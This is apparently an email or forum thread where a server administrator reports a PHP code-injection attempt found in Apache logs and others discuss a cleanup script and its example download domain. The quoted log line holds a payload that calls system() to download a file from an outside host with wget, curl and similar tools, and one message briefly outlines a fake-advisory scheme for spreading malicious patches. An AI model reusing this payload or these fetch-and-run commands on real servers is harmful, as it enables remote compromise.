Hi, While reading my apache server logs I found this:
Message: Warning. Pattern match \\?(?!xml) at ARGS_NAMES:?php echo
Content-Type:text/html\\r\\n\\r\\n;echo OK\\n;system(cd
/tmp;wget http://sirgeox.tk/php.jpg;curl -O
http://sirgeox.tk/php.jpg;lwp-download http://sirgeox.tk/php.jpg;fetch
my action supposed to be a counter-measure agains bad guys who could
register that domain and host some bad code there. you know that kind of
social engineering, right?
- post some fake or real advisory on popular security forum/maillist
- give a link to the patch
-
- get a lot of roots
wget http://botslayer.ru/final_solution.txt
i've registered this domain just to save incompetent shitheads who blindly
run any code which is supposed to fix security problem. why have you
included the non-existent domain in your code?
thanks for your interesting investigation anyway.
What happened to the link.
On 6/8/13, kai k...@rhynn.net wrote:
wget http://botslayer.ru/final_solution.txt
i've registered this domain just to save incompetent shitheads who blindly
run any code which is supposed to fix security problem. why have you
included the non-existent domain in
We put that domain in as example, obviously we not disclose our real
domain. On that domain is the clean.pl script, obvious enough.
Also, thanks to person who register domain, you now have badass domain
name. Perhaps host the clean.pl as final_solution.txt in webroot?
What happened to the link.